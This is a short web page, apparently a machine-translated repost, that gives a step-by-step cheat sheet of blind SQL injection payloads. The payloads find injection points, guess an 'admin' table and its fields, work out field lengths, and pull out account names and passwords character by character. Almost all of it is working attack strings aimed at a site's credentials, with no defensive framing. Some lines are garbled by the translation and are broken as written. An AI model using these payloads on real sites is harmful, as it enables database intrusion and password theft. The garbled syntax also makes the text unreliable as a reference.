Standard SQL injection Statements

Source: Internet
Author: User
Tags sql injection

1. Determine if there are any injection points
; and 1=1 and 1=2


2. Guess the table name is nothing more than the admin Adminuser user pass password and so on.
and 0<> (SELECT COUNT (*) from *)
and 0<> (SELECT COUNT (*) from admin)---Determine if the admin table exists

3. Guess the number of accounts if you encounter 0< return to the correct page 1< the error page describes the number of accounts is a
and 0< (SELECT COUNT (*) from admin)
and 1< (SELECT COUNT (*) from admin)

4. Guess the field name in Len () parentheses plus the field name we think of.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)--
and 1= (SELECT COUNT (*) from admin where Len (user field name "name") >0)
and 1= (SELECT COUNT (*) from admin where Len (_blank> password field name password) >0)

5. Guess the length of each field the length of the solution is to transform the >0 until it returns to the correct page.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)
and 1= (SELECT COUNT (*) from admin where Len (name) >6) error
and 1= (SELECT COUNT (*) from admin where Len (name) >5) The correct length is 6
and 1= (SELECT COUNT (*) from admin where Len (name) =6) is correct

and 1= (SELECT COUNT (*) from admin where Len (password) >11) correct
and 1= (SELECT COUNT (*) from admin where Len (password) >12) error length is 12
and 1= (SELECT COUNT (*) from admin where Len (password) =12) correct

6. Guessing characters
and 1= (SELECT COUNT (*) from the admin where left (name,1) =a)---Guess the first bit of the user account
and 1= (SELECT COUNT (*) from the admin where left (name,2) =ab)---Guess the second digit of the user account
Just add one character at a time so guess, guess enough you just guessed how many bits of the right, the account even came out
and 1= (select top 1 count (*) from Admin where ASC (mid (pass,5,1)) =51)--

Standard SQL injection Statements

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.